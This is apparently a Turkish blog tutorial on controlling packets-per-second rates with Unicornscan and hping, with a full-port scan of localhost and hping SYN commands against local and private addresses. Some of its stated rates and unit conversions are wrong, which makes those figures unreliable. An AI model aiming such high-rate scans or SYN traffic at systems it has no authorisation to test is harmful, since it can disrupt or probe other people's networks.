Unicornscan ile PPS belirtme

Unicornscan ile saniyede gönderilecek paket sayısını -r ya da –pps seçeneği kullanarak başarabiliriz.

Saniyede 1000 paket göndererek port tarama için(aynı zamanda hedef sisteme saniyede 1000 paket göndermeye yarar)

~# time unicornscan -vv –pps 1000 localhost:1-65535  -i lo
adding 127.0.0.1/32 mode `TCPscan’ ports `1-65535′ pps 1000
using interface(s) lo
scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a little longer than 1 Minutes, 12 Seconds
drone type Unknown on fd 4 is version 1.1
drone type Unknown on fd 3 is version 1.1
scan iteration 1 out of 1
using pcap filter: `dst 127.0.0.1 and ! src 127.0.0.1 and (tcp)’
using TSC delay

sender statistics 973.5 pps with 65535 packets sent total
listener statistics 0 packets recieved 0 packets droped and 0 interface drops

real    1m15.778s
user    1m6.452s
sys     0m0.764s

görüleceği üzere 1000 paket olmasa da pps değerimiz 973’e ayarlanmış durumda

 Hping ile isteğe göre PPS

Hping ile paket üretirken -i parametresini kullanarak gönderilecek paketler arasında ne kadarlık bekleme yapılacağı belirtilebilir. -i ‘den sonra -u kullanırsak mikrosaniye(saniyenin 100.000 de biri) değeri olur. Biz de saniy eile mikro saniye arasındaki farkı kullanarak Hping’e ne saniyede ne kadar paket oluşturması gerektiğini zöyleyebiliriz.

Saniyede 10 paket göndermek için

#hping -i u10000 -S -p 99 localhost

Saniyede 1000 paket göndermek istersek -i100 değerini kullanabiliriz.

#hping -S -p 0 192.168.2.23 -c 1000 -i u100
Sonuç: Düzgün değerde pps üretimi için en idel araç şimdilik Nmap gözüküyor ama Hping’in esnekliğini de unutmamak gerekir.

The post Nmap, Unicornscan ve Hping ile performans testleri first appeared on Complexity is the enemy of Security.

PDF halinde okumak isterseniz http://www.guvenlikegitimleri.com/new/calismalar/hping1.pdf

The post Hping yazı dizisi-1: hping kullanarak tcp paketleriyle oynama first appeared on Complexity is the enemy of Security.